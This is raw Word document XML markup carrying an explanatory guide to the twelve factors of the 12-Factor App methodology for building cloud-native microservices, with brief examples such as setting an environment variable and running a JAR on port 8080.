        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The 12-Factor App methodology is a set of principles designed for building cloud-native, scalable, and maintainable microservices applications. These principles help developers build applications that are easy to deploy, easy to scale, and easy to manage in the cloud environment. Here’s a breakdown of the 12 factors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D45E0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 Codebase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092930E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One codebase tracked in version control</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: A microservices application should have </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>one codebase</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is tracked by </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>version control (e.g., Git)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. This codebase can be deployed to multiple environments (development, staging, production), but it should remain </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>single</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> across all instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C45E464"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Each microservice should have its own Git repository, where the code is versioned and tracked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705774F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2. Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F211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plicitly declare and isolate dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Dependencies should be explicitly declared in the project’s configuration files (e.g., pom.xml for Maven, build.gradle for Gradle). The application should not assume that dependencies are available in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39163944"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a package manager (e.g., npm for Node.js, pip for Python) to install dependencies. Ensure that all dependencies are versioned and isolated from the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249FB67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3. Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2838D2"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ore config in the environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Configuration should be stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>environment variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than in the codebase itself. This enables </w:t>
      </w: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xml:space="preserve"> in deployment, allowing you to easily change configurations based on the environment (e.g., staging vs. production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818833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environment variables for API keys, database credentials, or any other environment-specific information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6FA8C8"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export DATABASE_URL=jdbc:mysql://localhost:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AAD087"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4. Backing Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590EBD02"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reat backing services as attached resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Treat services like databases, caching systems, message queues, and third-party APIs as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>attached resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>external</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the application. They should be replaceable without affecting the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2575DA22"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If the database is moved from MySQL to PostgreSQL, the application’s behavior should not change (apart from minor configuration changes like connection strings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353E0D1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5. Build, Release, Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2889E54F"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trictly separate build and run stages</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: The application should have a clear distinction between the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>build</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leas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un</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> stages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2EBE06"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Build</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Compiling code, resolving dependencies, and creating a deployable artifact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153CBA1C"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lease</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Creating a release by combining the build with environment-specific configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC740D" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="00585F60">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un</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Executing the application in a given environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BCF32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Use a CI/CD pipeline to handle building, testing, and deploying the microservice in stages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA3176"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6. Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8381D"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ecute the app as one or more stateless processes</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stateless</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., they should not store data between requests). Any state required should be stored externally (e.g., in a database or cache). This allows processes to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>easily scaled</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> and recovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED6583"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The microservice should not rely on in-memory session storage. Instead, use a session store or database to persist the state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5C16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7. Port Binding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CB900C"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lastRenderedPageBreak/>
        <w:t>Export services via port binding</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self-contained</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> and should expose HTTP or other services through </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>ports</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. The microservice should be </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>independent of any server</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> or container and should run as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>standalone service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6161CBB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A microservice might expose a REST API over port 8080 that can be accessed by other services or clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD0FD8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java -jar myapp.jar --server.port=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9AF9EA"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8. Concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47723FC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e out via the process model</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Microservices should be able to scale horizontally by adding more instances of the application (i.e., running multiple copies of the service across machines or containers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050590DC"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Run multiple instances of a microservice (e.g., using Kubernetes or Docker Swarm) to handle increased traffic, with load balancing to distribute requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192FA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9. Disposability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F8C0E"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ximize robustness with fast startup and graceful shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Microservices should be </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>disposable</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means they should be able to start quickly and shut down gracefully when necessary. This improves </w:t>
      </w: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liability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, particularly in cloud environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCCBEE"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A microservice should be able to handle termination signals (e.g., SIGTERM) and clean up resources before shutting down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342830F2"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0. Dev/Prod Parity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA7255"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Keep development, staging, and production as similar as possible</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: The development, staging, and production environments should be as similar as possible to avoid </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>bugs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> that occur only in production. This ensures that what works in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>development</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> works in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>production</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130E61F"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xml:space="preserve">: Use containerization (e.g., Docker) to ensure that the development and production environments are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>identical</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF8F26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1. Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58791E28"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Treat logs as event streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Logs should be treated as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>streams of events</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Microservices should not manage log files themselves. Instead, they should </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>emit logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>centralized logging system</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., ELK stack, Fluentd, or CloudWatch) for easy collection, aggregation, and analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3986C736"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Send logs to a centralized logging service to ensure that logs are collected and easily searchable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029544E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12. Admin Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381F79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un admin/management tasks as one-off processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Administrative tasks like database migrations, cron jobs, or other maintenance tasks should be run as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>one-off processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are distinct from the main application processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C032363"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
